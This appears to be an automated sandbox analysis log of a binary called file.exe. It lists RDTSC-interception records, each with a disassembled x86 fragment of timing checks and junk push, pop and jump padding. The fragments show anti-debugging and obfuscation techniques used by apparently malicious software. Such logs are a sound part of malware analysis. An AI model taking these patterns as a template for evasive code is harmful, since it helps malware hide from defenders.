Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F5509 second address: 11F5512 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F5512 second address: 11F556F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 jl 00007F9668C559D6h 0x0000000f mov ebx, dword ptr [ebp+1248B61Fh] 0x00000015 push 00000000h 0x00000017 push edx 0x00000018 call 00007F9668C559D8h 0x0000001d pop edx 0x0000001e mov dword ptr [esp+04h], edx 0x00000022 add dword ptr [esp+04h], 0000001Ah 0x0000002a inc edx 0x0000002b push edx 0x0000002c ret 0x0000002d pop edx 0x0000002e ret 0x0000002f jmp 00007F9668C559E3h 0x00000034 add eax, ebx 0x00000036 sbb edi, 1D0B1A77h 0x0000003c push eax 0x0000003d push eax 0x0000003e push edx 0x0000003f jnl 00007F9668C559D8h 0x00000045 pushad 0x00000046 popad 0x00000047 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1244131 second address: 1244154 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9668BCCCD3h 0x00000009 popad 0x0000000a pushad 0x0000000b jg 00007F9668BCCCC6h 0x00000011 push edi 0x00000012 pop edi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1244154 second address: 124415A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124415A second address: 124416D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 jmp 00007F9668BCCCCAh 0x0000000d pop esi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124416D second address: 1244176 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop ebx 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1244BA5 second address: 1244BAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1244BAB second address: 1244BAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1244BAF second address: 1244BB3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1244BB3 second address: 1244BB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124CF31 second address: 124CF58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007F9668BCCCD1h 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F9668BCCCCDh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124D266 second address: 124D27D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9668C559E1h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124D56D second address: 124D577 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F9668BCCCC6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124D577 second address: 124D586 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jns 00007F9668C559D6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1250A9D second address: 1250AA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125119E second address: 12511A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12511A5 second address: 12511D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop ecx 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a jnp 00007F9668BCCCCEh 0x00000010 pushad 0x00000011 jmp 00007F9668BCCCCCh 0x00000016 push edx 0x00000017 pop edx 0x00000018 pushad 0x00000019 popad 0x0000001a push esi 0x0000001b pop esi 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125149A second address: 125149E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125149E second address: 12514C6 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F9668BCCCC6h 0x00000008 jmp 00007F9668BCCCD8h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push edx 0x00000012 pop edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12514C6 second address: 12514CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1255D52 second address: 1255D6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jmp 00007F9668BCCCD5h 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125F1AB second address: 125F1C6 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007F9668C559E5h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125D96A second address: 125D976 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F9668BCCCC6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125D976 second address: 125D988 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a jng 00007F9668C559DCh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125D988 second address: 125D996 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F9668BCCCCEh 0x0000000a push eax 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125D996 second address: 125D99A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125D99A second address: 125D99F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125DAC6 second address: 125DAD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnp 00007F9668C559DCh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125DAD7 second address: 125DADE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125DDBA second address: 125DDBE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125DDBE second address: 125DDCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007F9668BCCCD2h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125DDCC second address: 125DDD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125DDD2 second address: 125DDD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125DDD6 second address: 125DDDC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125DF1A second address: 125DF3A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9668BCCCD6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125DF3A second address: 125DF46 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F9668C559D6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125DF46 second address: 125DF59 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9668BCCCCDh 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a pop edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125E8FF second address: 125E904 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125E904 second address: 125E92F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 popad 0x00000007 pop edi 0x00000008 push edi 0x00000009 jmp 00007F9668BCCCD5h 0x0000000e pop edi 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push edx 0x00000014 jne 00007F9668BCCCC6h 0x0000001a pop edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125E92F second address: 125E935 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125E935 second address: 125E939 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125CF49 second address: 125CF7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 popad 0x00000009 pushad 0x0000000a jmp 00007F9668C559DCh 0x0000000f jmp 00007F9668C559E2h 0x00000014 jo 00007F9668C559D6h 0x0000001a push edi 0x0000001b pop edi 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1264B94 second address: 1264B9B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1264B9B second address: 1264BB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F9668C559DBh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1264566 second address: 126456A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126456A second address: 1264581 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9668C559DDh 0x00000007 jnp 00007F9668C559D6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12646F0 second address: 1264706 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F9668BCCCD0h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1264874 second address: 126487C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126487C second address: 12648A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9668BCCCCBh 0x00000009 push esi 0x0000000a pop esi 0x0000000b popad 0x0000000c popad 0x0000000d pushad 0x0000000e pushad 0x0000000f jmp 00007F9668BCCCCEh 0x00000014 jp 00007F9668BCCCC6h 0x0000001a popad 0x0000001b push esi 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127142B second address: 127145A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9668C559E1h 0x00000009 popad 0x0000000a pushad 0x0000000b jg 00007F9668C559D6h 0x00000011 jo 00007F9668C559D6h 0x00000017 popad 0x00000018 pushad 0x00000019 jne 00007F9668C559D6h 0x0000001f pushad 0x00000020 popad 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12749EF second address: 12749F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12743E2 second address: 12743FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9668C559E1h 0x00000009 popad 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12743FD second address: 1274424 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F9668BCCCC6h 0x0000000a popad 0x0000000b jmp 00007F9668BCCCD4h 0x00000010 push eax 0x00000011 push edx 0x00000012 jne 00007F9668BCCCC6h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1274424 second address: 1274437 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 js 00007F9668C559EAh 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1274437 second address: 127443B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1274593 second address: 1274597 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1274597 second address: 12745B0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9668BCCCD5h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1278079 second address: 1278081 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1278081 second address: 127808B instructions: 0x00000000 rdtsc 0x00000002 jne 00007F9668BCCCC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127808B second address: 12780A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 push ecx 0x00000009 jmp 00007F9668C559DFh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127D3EE second address: 127D3F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127D3F2 second address: 127D408 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007F9668C559D8h 0x0000000c push edi 0x0000000d pop edi 0x0000000e push eax 0x0000000f push edx 0x00000010 jg 00007F9668C559D6h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1285642 second address: 1285648 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1285648 second address: 128564E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129035C second address: 1290362 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128EF79 second address: 128EFA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9668C559E8h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jo 00007F9668C559D6h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128F25B second address: 128F261 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128F261 second address: 128F265 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128F3FF second address: 128F405 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1290092 second address: 1290097 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1290097 second address: 12900AE instructions: 0x00000000 rdtsc 0x00000002 jo 00007F9668BCCCCCh 0x00000008 js 00007F9668BCCCC6h 0x0000000e pushad 0x0000000f jg 00007F9668BCCCC6h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129291A second address: 1292934 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9668C559E6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129485C second address: 1294878 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9668BCCCD0h 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e pop esi 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1294878 second address: 129487C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129487C second address: 12948A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 jng 00007F9668BCCCEDh 0x0000000f jmp 00007F9668BCCCD9h 0x00000014 push ecx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12943BA second address: 12943C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129451D second address: 1294559 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F9668BCCCCEh 0x00000008 ja 00007F9668BCCCC6h 0x0000000e pop ecx 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 ja 00007F9668BCCCC8h 0x00000019 push ecx 0x0000001a pop ecx 0x0000001b jmp 00007F9668BCCCD8h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129D4A1 second address: 129D4A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129D4A5 second address: 129D4C1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9668BCCCD8h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129F1F1 second address: 129F1FB instructions: 0x00000000 rdtsc 0x00000002 jc 00007F9668C559E2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129F1FB second address: 129F20D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F9668BCCCC6h 0x0000000a jbe 00007F9668BCCCCCh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129F20D second address: 129F218 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129F218 second address: 129F21C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B060B second address: 12B0619 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9668C559DAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B0619 second address: 12B0623 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F9668BCCCCCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B41C8 second address: 12B41CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B41CC second address: 12B41D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CC651 second address: 12CC666 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F9668C559D6h 0x00000008 jc 00007F9668C559D6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CC666 second address: 12CC6A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9668BCCCD7h 0x00000009 pop ebx 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jp 00007F9668BCCCC6h 0x00000013 jmp 00007F9668BCCCD6h 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CB724 second address: 12CB72C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CB87F second address: 12CB883 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CBBB6 second address: 12CBBBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CDC2C second address: 12CDC31 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D0808 second address: 12D0817 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9668C559DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D0A3C second address: 12D0AA4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9668BCCCD7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F9668BCCCD9h 0x0000000f nop 0x00000010 or dword ptr [ebp+122D1DF3h], edx 0x00000016 push dword ptr [ebp+122D1812h] 0x0000001c movsx edx, dx 0x0000001f call 00007F9668BCCCC9h 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 jmp 00007F9668BCCCD6h 0x0000002c pop eax 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12D0AA4 second address: 12D0AA9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12D0AA9 second address: 12D0AD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F9668BCCCC6h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e jmp 00007F9668BCCCCFh 0x00000013 mov eax, dword ptr [esp+04h] 0x00000017 push eax 0x00000018 push edx 0x00000019 push esi 0x0000001a jno 00007F9668BCCCC6h 0x00000020 pop esi 0x00000021 rdtsc
